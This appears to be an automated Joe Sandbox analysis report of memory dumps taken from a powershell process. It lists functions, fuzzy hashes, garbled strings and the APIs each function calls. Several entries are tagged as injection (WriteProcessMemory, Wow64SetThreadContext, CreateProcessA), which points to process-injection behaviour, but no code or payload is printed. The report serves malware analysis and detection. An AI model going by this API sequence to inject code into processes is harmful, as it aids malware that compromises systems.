Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b88fba6cfc0d01583f29b90962d941adfe3ca9426a63c8b1d36e66ab64653aa
Instruction ID: 647c2ea42a3ed09cb462fd396b250a7f6de69330eb066260ebedb1e0955842f9
Opcode Fuzzy Hash: 6b88fba6cfc0d01583f29b90962d941adfe3ca9426a63c8b1d36e66ab64653aa
Instruction Fuzzy Hash: 8E91E870E55218CFDB64CFAAD488B9DBBF2BF48348F2490A9E409A7351D7709986CF41

Function 06E66875 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ace21e9d4e741b73fa4d9e64db25ff82181a456ddd98412c42ccba975170bc
Instruction ID: e32ff091c2ac3a5da5e4eecd8831102f5d73d23f3c761861c72c4aef5db92031
Opcode Fuzzy Hash: a0ace21e9d4e741b73fa4d9e64db25ff82181a456ddd98412c42ccba975170bc
Instruction Fuzzy Hash: 80911870D61318CFEBA4CF6AC584B9DBBF2BF45344F1490A9E409A7250DB745985CF82

Function 06C651A8 Relevance: 18.5, Strings: 14, Instructions: 979COMMON

Download Yara Rule

Strings

LRj, xrefs: 06C65BBE
0Jj, xrefs: 06C65332
G,j, xrefs: 06C65AB2
G,j, xrefs: 06C65802
G,j, xrefs: 06C65C51
G,j, xrefs: 06C657F8
LRj, xrefs: 06C65BCC
G,j, xrefs: 06C65C47
G,j, xrefs: 06C65422
G,j, xrefs: 06C65ABC
0Jj, xrefs: 06C65340
G,j, xrefs: 06C6521F
G,j, xrefs: 06C65418
G,j, xrefs: 06C65229

Memory Dump Source

Source File: 00000006.00000002.57193473310.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c60000_powershell.jbxd

Similarity

API ID:
String ID: 0Jj$0Jj$LRj$LRj$G,j$G,j$G,j$G,j$G,j$G,j$G,j$G,j$G,j$G,j
API String ID: 0-532016892
Opcode ID: 87152c0e9aa949a00ff5c41bf8752bca702cdfccd741e6681af2b13621ddcbfe
Instruction ID: cfaf118624b793e51da92729ad767bb7bd9101b0382e61228a04ab88878b9a53
Opcode Fuzzy Hash: 87152c0e9aa949a00ff5c41bf8752bca702cdfccd741e6681af2b13621ddcbfe
Instruction Fuzzy Hash: 07722735B00208DFDB95DF6AC88476ABBF6AFC5210FB4806EE405CB291DB71D941CBA5

Function 07315858 Relevance: 16.9, Strings: 13, Instructions: 683
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G,j, xrefs: 07317471
G,j, xrefs: 0731767B
+j, xrefs: 073167D0
G,j, xrefs: 07317148
G,j, xrefs: 07317685
P0*j, xrefs: 0731720A
P0*j, xrefs: 07317200
G,j, xrefs: 07317152
\}'j, xrefs: 073175E6
G,j, xrefs: 07317467
+j, xrefs: 07315ADB
+j, xrefs: 07315AE5
\}'j, xrefs: 073175F4

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: +j$ +j$ +j$P0*j$P0*j$\}'j$\}'j$G,j$G,j$G,j$G,j$G,j$G,j
API String ID: 0-3666320904
Opcode ID: 434966da1df018582fa255b17c7818c1663de761136b9010ca55db97fe1e06a5
Instruction ID: b4f5964e0b6e7ff61b25c8183ec4886fbc15461885822bb669c7c23d5ea5b533
Opcode Fuzzy Hash: 434966da1df018582fa255b17c7818c1663de761136b9010ca55db97fe1e06a5
Instruction Fuzzy Hash: 985259B0A00309CFEB58DB58C454A6ABBB2AFC9314F24C169D91D9F755CB72EC52CB81

Function 06C63167 Relevance: 16.2, Strings: 12, Instructions: 1230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@b,j, xrefs: 06C63515
4[,j, xrefs: 06C62F25
4[,j, xrefs: 06C639B2
0Jj, xrefs: 06C633B1
4[,j, xrefs: 06C62B24
PHj, xrefs: 06C62AB7
@b,j, xrefs: 06C63B45
4[,j, xrefs: 06C62E87
4[,j, xrefs: 06C62F8F
@b,j, xrefs: 06C62C73
PHj, xrefs: 06C63945
4[,j, xrefs: 06C6336B

Memory Dump Source

Source File: 00000006.00000002.57193473310.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c60000_powershell.jbxd

Similarity

API ID:
String ID: 0Jj$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$@b,j$@b,j$@b,j$PHj$PHj
API String ID: 0-2062262273
Opcode ID: 2339584300dbe3a6e4b026e6482ce47d4321de2d113630ec0118d4209dd8d950
Instruction ID: 804da0f09dd092aa995e7c655cc421dd50ca77b216ac74a465f35681920ae654
Opcode Fuzzy Hash: 2339584300dbe3a6e4b026e6482ce47d4321de2d113630ec0118d4209dd8d950
Instruction Fuzzy Hash: 6FC23F74A402189FD754CF14D994B9AFBB2EB89304F1581E9EA09AF341CB71ED82CF85

Function 07314846 Relevance: 13.3, Strings: 10, Instructions: 834COMMON

Download Yara Rule

Strings

G,j, xrefs: 073151F3
G,j, xrefs: 07315030
G,j, xrefs: 07314C95
G,j, xrefs: 07314C8B
G,j, xrefs: 07314EB7
G,j, xrefs: 07314EC1
G,j, xrefs: 0731503A
\}'j, xrefs: 07315383
G,j, xrefs: 073151FD
\}'j, xrefs: 07315391

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: \}'j$\}'j$G,j$G,j$G,j$G,j$G,j$G,j$G,j$G,j
API String ID: 0-2751452117
Opcode ID: 0c5964a0a3f9dd1d7d46e3ef9cd13f5993655ec96b960dbaf4ecb22a2027a169
Instruction ID: 53e2f25ef1e8460ff73569ba7575563b5e08fe19f2a83677c014540affe5e6ce
Opcode Fuzzy Hash: 0c5964a0a3f9dd1d7d46e3ef9cd13f5993655ec96b960dbaf4ecb22a2027a169
Instruction Fuzzy Hash: D65218B5B0024ADFEB5CDB65C850B6ABBF6AFC5310F24C46AD409DB241DB72C852C792

Function 006B28F8 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 407
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ze, xrefs: 006B2A28
l{e, xrefs: 006B2B2B
$|e, xrefs: 006B2C80
ze, xrefs: 006B2A46

Memory Dump Source

Source File: 00000006.00000002.57159800504.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6b0000_powershell.jbxd

Similarity

API ID:
String ID: $|e$l{e$ze$ze
API String ID: 0-3999551689
Opcode ID: 9f61cb3393ee7c7ef9c0ca0dd0cb7db7621282a1c0614f3c3981b44ff390fb94
Instruction ID: c33fe91fb85417303a5058280b754437f5e4353e3af1f4c7fc2f2021e33b5284
Opcode Fuzzy Hash: 9f61cb3393ee7c7ef9c0ca0dd0cb7db7621282a1c0614f3c3981b44ff390fb94
Instruction Fuzzy Hash: 84020475A002099FDB15CF98D494ADEBBF2FF88314F248559E849AB361C731ED82CB94

Function 0731D5AD Relevance: 8.0, Strings: 6, Instructions: 487
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4[,j, xrefs: 0731D9D2
4[,j, xrefs: 0731D9DE
4[,j, xrefs: 0731DA48
4[,j, xrefs: 0731DA3E
4[,j, xrefs: 0731D959
4[,j, xrefs: 0731D94D

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: 4[,j$4[,j$4[,j$4[,j$4[,j$4[,j
API String ID: 0-981877565
Opcode ID: ccb74236d182173ce16c4500903b1de7adb55ec247b5e812d56a6dcd0a7097b8
Instruction ID: a84fc29955c0175b996dc11af3502f416f80d5826dbea0eeea23d7a8a44433d1
Opcode Fuzzy Hash: ccb74236d182173ce16c4500903b1de7adb55ec247b5e812d56a6dcd0a7097b8
Instruction Fuzzy Hash: A6224074B402198FE758CB14C990BAAB7B2AF89304F14C5E9D90AAF355CB71ED81CB91

Function 06C306D8 Relevance: 2.8, Strings: 2, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Pd=(pd=(, xrefs: 06C3070B, 06C307E9, 06C308C3, 06C309D3
s$, xrefs: 06C309BB, 06C309C0

Memory Dump Source

Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd

Similarity

API ID:
String ID: Pd=(pd=($s$
API String ID: 0-490788296
Opcode ID: fe5e3ea12c8e1a7073da78be0e6cd9420f93655ecffa9ca0309a00235fe81064
Instruction ID: b76807ec7cdf544cd073813edb3a254de8ea671027317aa8f063c88252243b61
Opcode Fuzzy Hash: fe5e3ea12c8e1a7073da78be0e6cd9420f93655ecffa9ca0309a00235fe81064
Instruction Fuzzy Hash: 2CA1AC76B01218DFDB45DFA5D554AADBBF2EF89301F2440A9E502AB381EB31DE41CB90

Function 07313A80 Relevance: 2.7, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G,j, xrefs: 07313ABA
G,j, xrefs: 07313AB0

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: G,j$G,j
API String ID: 0-228363525
Opcode ID: f9a899fe7fad85b183f7949536c24323d0f13c3c630852c5ff47fbed530ce27d
Instruction ID: dbabb5a7f3ae614228e0c32b54dfd1d4c7a6e368f9e36ae2ab9a89c96f3bd68f
Opcode Fuzzy Hash: f9a899fe7fad85b183f7949536c24323d0f13c3c630852c5ff47fbed530ce27d
Instruction Fuzzy Hash: 8A513DF1704316CFEB299A7A944036ABBE6AFC6310F24847ED44ECB641EA71C845C7A1

Function 07310488 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G,j, xrefs: 073104C2
G,j, xrefs: 073104B8

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: G,j$G,j
API String ID: 0-228363525
Opcode ID: e2a74adc72ae26de5e1a11d4f1801535b8398828220238dc6e64a1d85437ce0b
Instruction ID: 803c6b7a21112b84007313d98a395d5e223a60ec9bcd75146e97db490069b84a
Opcode Fuzzy Hash: e2a74adc72ae26de5e1a11d4f1801535b8398828220238dc6e64a1d85437ce0b
Instruction Fuzzy Hash: B35119F1B093058FEB5D9A74982076E7BE69FC6210F54806AD449DF182DE75C8C1C7A2

Function 07311BC8 Relevance: 2.6, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P0*j, xrefs: 07311BF3
P0*j, xrefs: 07311BFF

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: P0*j$P0*j
API String ID: 0-3391056851
Opcode ID: d1a9265907798b65a6344f318fdc27998dda4534bae6813edfbdb395bf8f8550
Instruction ID: f63fcb09068bb03535fc2526a52885afcd966e56ac3d19edf08a0861888474c3
Opcode Fuzzy Hash: d1a9265907798b65a6344f318fdc27998dda4534bae6813edfbdb395bf8f8550
Instruction Fuzzy Hash: 1F4161717103589FE7648B648854BAEBFF5EF85710F15C05AEA89EF382C9719C01C3A5

Function 07316DEB Relevance: 1.8, Strings: 1, Instructions: 574
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+j, xrefs: 073167D0

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: +j
API String ID: 0-1387894366
Opcode ID: a15fc508729a9b197ae0d35f670a37896246fe9a833f77a3cee2866a48cfcea3
Instruction ID: b17f35777680e539ba3b9bc4f952a109ffa7b08d3f4d126d85549f107a15e5de
Opcode Fuzzy Hash: a15fc508729a9b197ae0d35f670a37896246fe9a833f77a3cee2866a48cfcea3
Instruction Fuzzy Hash: 9E4228B4A00218CFEB68CB54C995B69BBB2AF89314F15C1D9D90D9B356CB72EC81CF41

Function 06C9E12A Relevance: 1.7, APIs: 1, Instructions: 204
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C9E30A

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f27cf4667cb98090c4e2ded0f7b227dcc1e8ad3b49ab46114d6d9596b0985049
Instruction ID: 99ed81b41f17f20c39387020aa0d04393ec2104f256c75113ed745570671cf57
Opcode Fuzzy Hash: f27cf4667cb98090c4e2ded0f7b227dcc1e8ad3b49ab46114d6d9596b0985049
Instruction Fuzzy Hash: 6F814471D006099FDF50CFA9C8897AEBBF2FF48310F14852AE815A7290DB749981CF91

Function 06C9E130 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C9E30A

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b217fb4b93da52324167db2adffe5da4410e5acc75a80f95bc066be9b010467d
Instruction ID: 38682ef7cff9116eea40e790abf67107b493f69952998698a72439a54ba22628
Opcode Fuzzy Hash: b217fb4b93da52324167db2adffe5da4410e5acc75a80f95bc066be9b010467d
Instruction Fuzzy Hash: B1814371D006498FDF50CFA9C8897AEBBF2FF58310F14852AE855A7290DB749981CF91

Function 06C90EAD Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 06C90F9F

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 5b176bcaa3261b71d1c8645f1f1e1a09f8c486f03b28b5a772689c40d7a7b8f5
Instruction ID: dcef69b9844f36dce7b842418dc4f9657c9db04ee2c8850c8b4b5f5ab737c236
Opcode Fuzzy Hash: 5b176bcaa3261b71d1c8645f1f1e1a09f8c486f03b28b5a772689c40d7a7b8f5
Instruction Fuzzy Hash: 03418571D002489FDF60DFA9D8857AEBBB1FF48314F14852EE819A7240D7749946CF94

Function 06C90B44 Relevance: 1.6, APIs: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06C90C39

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3a61125390eb6a91d7e3c6bedb00ab258f734b91bc7d3a3e303f542309a58505
Instruction ID: 3e07d897bca88f6c5280c4abdf83139be1cdcd548226407051e81130e39df56e
Opcode Fuzzy Hash: 3a61125390eb6a91d7e3c6bedb00ab258f734b91bc7d3a3e303f542309a58505
Instruction Fuzzy Hash: 7B415571E00258DFDF60DFA9C885B9EBBB1FF48314F14842EE815A7240D7759885CBA1

Function 06C90EB8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 06C90F9F

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 8a33062a98ff81282929abfaf0a36f35790f5727f396e844950d3ab92cee3d7a
Instruction ID: 957644ad2b772084ab46ec8cb3d2fa980c8d697698940b4ad6f981f5c9f0b066
Opcode Fuzzy Hash: 8a33062a98ff81282929abfaf0a36f35790f5727f396e844950d3ab92cee3d7a
Instruction Fuzzy Hash: F0417471D102489FDF50DFA9C889BAEBBB1FF48314F14852EE819A7240DB749985CFA4

Function 06C90B50 Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06C90C39

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 019b9f3e597dc39dff52b2042151dd0ed741697ab13a253d792be87e33cfff5b
Instruction ID: d5c06147f9386055d36f84674641e95ddf2fe8fe4f3f55e8c22078585ff76f62
Opcode Fuzzy Hash: 019b9f3e597dc39dff52b2042151dd0ed741697ab13a253d792be87e33cfff5b
Instruction Fuzzy Hash: 64413571E002589FDF50DFA9C889B9EBBB1FF48314F14852EE815A7250DB759481CFA1

Function 006B1BFA Relevance: 1.6, APIs: 1, Instructions: 82injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,00000001), ref: 006B2DF5

Memory Dump Source

Source File: 00000006.00000002.57159800504.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6b0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d80034bbf9290b0068be3a4f730ab1946f2419c92af12b0f94573d4360bf9241
Instruction ID: 6216abfbbb15091bb06cf8de18d97bab996290b149979052f52e71fd740a9c0f
Opcode Fuzzy Hash: d80034bbf9290b0068be3a4f730ab1946f2419c92af12b0f94573d4360bf9241
Instruction Fuzzy Hash: 4A3189B19053899FDB11DFA9C884BDEBFF0FF49310F10846AE418A7251C334A944CBA5

Function 06C9F0D8 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C9F170

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 46787fc41f711f56854b0b4da6b6f8e6454d3c5f0e8b18a2bdf0a473f26eb9d6
Instruction ID: 7536b2c0be30620e3dd91e6613c956bc43105f9ff2520ba940bf0a38458e4907
Opcode Fuzzy Hash: 46787fc41f711f56854b0b4da6b6f8e6454d3c5f0e8b18a2bdf0a473f26eb9d6
Instruction Fuzzy Hash: 802126B29003499FDF10DFA9D884BEEBBF1EB48314F50842AE819A7240C7789945CBA4

Function 06C9F0E0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C9F170

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 90601c07136e7a79cadda0aa1bf5e2a120216f2799b92c83531b2bcc800c1596
Instruction ID: 348e620e87aeec03818bdb1084439ec92915d2a004bcae2e24b4dae85b5608bf
Opcode Fuzzy Hash: 90601c07136e7a79cadda0aa1bf5e2a120216f2799b92c83531b2bcc800c1596
Instruction Fuzzy Hash: 232117B2D003499FDF10DFA9C884BDEBBF5FB49314F50842AE919A7240D7789945CBA4

Function 006B1C52 Relevance: 1.6, APIs: 1, Instructions: 66injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,00000001), ref: 006B2DF5

Memory Dump Source

Source File: 00000006.00000002.57159800504.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6b0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6d90a0f7d4305ea8c809bbfb45262109648eefd2aa6c26fe97eb892c84ce60e2
Instruction ID: 02a2f46cb96047ec04e27620abfa7a50872f07a1d94c129121ce7321f1ba4bc7
Opcode Fuzzy Hash: 6d90a0f7d4305ea8c809bbfb45262109648eefd2aa6c26fe97eb892c84ce60e2
Instruction Fuzzy Hash: E421E0B59003499FDB14DF9AD885BDEBBF5FB48314F10842AE819A7350D374A944CBA4

Function 06C9E831 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C9E8B6

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2991703ae8387f6161e130230e19f612ca0382d6dd246fed0760b5896596e5ac
Instruction ID: 7044dec5d9f303ab29a7349e7b07f5f2beb3bd70d844bf9d93384f0803bf4dff
Opcode Fuzzy Hash: 2991703ae8387f6161e130230e19f612ca0382d6dd246fed0760b5896596e5ac
Instruction Fuzzy Hash: F6213A72D003099FDB14DFAAC4857EEBBF4EF49214F54842ED419A7240D778A945CFA4

Function 06C9E838 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C9E8B6

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7d6c7b2ee845a1e99f261e8ced9b6bdc561cf68dce0caddecd3e8f1c337f977b
Instruction ID: 70a5a2af1a295acd69af25b07cfc73fe03f16bc0d1e037de68736af2e6651412
Opcode Fuzzy Hash: 7d6c7b2ee845a1e99f261e8ced9b6bdc561cf68dce0caddecd3e8f1c337f977b
Instruction Fuzzy Hash: 38213572D003098FDB14DFAAC4847EEBBF4EF89224F54842ED419A7240D778A945CFA4

Function 06C91220 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 06C91296

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 44b1e934597961d7fb76d4241c99b3e2d495ca1c713a29ffbae45b054896fbad
Instruction ID: a7b8fb2096edde2a7db6bdba2a243361672904985f125391a6ea03faaef48c08
Opcode Fuzzy Hash: 44b1e934597961d7fb76d4241c99b3e2d495ca1c713a29ffbae45b054896fbad
Instruction Fuzzy Hash: 381167768002099FDF10DFAAD845BEFBFF5EB88320F14881AE419A7200C734A940CBA0

Function 06C91228 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 06C91296

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 97a6710ded86a5e6a7283475500ef20e73d6204e36a1cf4ff0c3caa3214b8c2e
Instruction ID: 5475ab837bf3e10c4b38e356db0462ece2bda8265aa895cda5fbc6fb673a24f7
Opcode Fuzzy Hash: 97a6710ded86a5e6a7283475500ef20e73d6204e36a1cf4ff0c3caa3214b8c2e
Instruction Fuzzy Hash: F7112676C003499FDF10DFAAD845BEEBBF5EB89320F14881AE415A7250C775A944CBA4

Function 06C32D7F Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

W, xrefs: 06C32D8D

Memory Dump Source

Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: a3a748f343d1262764a6dbac3a71fd4fdfb4ea7f194a95d9fbfdbcc0d60b2902
Instruction ID: c3e63f88bf2d21123998675e9662407ab7d72039eb46196196ceaa941100f5ca
Opcode Fuzzy Hash: a3a748f343d1262764a6dbac3a71fd4fdfb4ea7f194a95d9fbfdbcc0d60b2902
Instruction Fuzzy Hash: 3E61BE717003208FDB69EB34D868A6E77B2AF85301B1044ADDA069F3A5DE39AD06C795

Function 07311F20 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

D, i, xrefs: 0731203F

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: D, i
API String ID: 0-2777633452
Opcode ID: f4cf3f3c19304841d5677835ea0e6d05e498e9ada57b1a0c311d162712c6002f
Instruction ID: 68d42530aed557f864b01938049ea042c65cc52763590faead140c862a17c61b
Opcode Fuzzy Hash: f4cf3f3c19304841d5677835ea0e6d05e498e9ada57b1a0c311d162712c6002f
Instruction Fuzzy Hash: B0411DB170930ACFF72D96659810AA7BBA7AFC5210B24826BE64DCB255DF72CC01C352

Function 0731046A Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

G,j, xrefs: 073104B8

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7310000_powershell.jbxd

Similarity

API ID:
String ID: G,j
API String ID: 0-3403446747
Opcode ID: 128e4de73969187de7e9087c473ff7ba7cda2f4532e969a3e2f8b73b31b8ea8f
Instruction ID: 235d8083858ead05eb39f1b3371b54b2d82b572b5f4b489a6192616fae4031c3
Opcode Fuzzy Hash: 128e4de73969187de7e9087c473ff7ba7cda2f4532e969a3e2f8b73b31b8ea8f
Instruction Fuzzy Hash: 8E313AF164A30A9FFB6C5A34886077A7BF6AF81200F458066D44DDB192DB38C9C1CB62

Function 07313A61 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

G,j, xrefs: 07313AB0

Memory Dump Source

Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

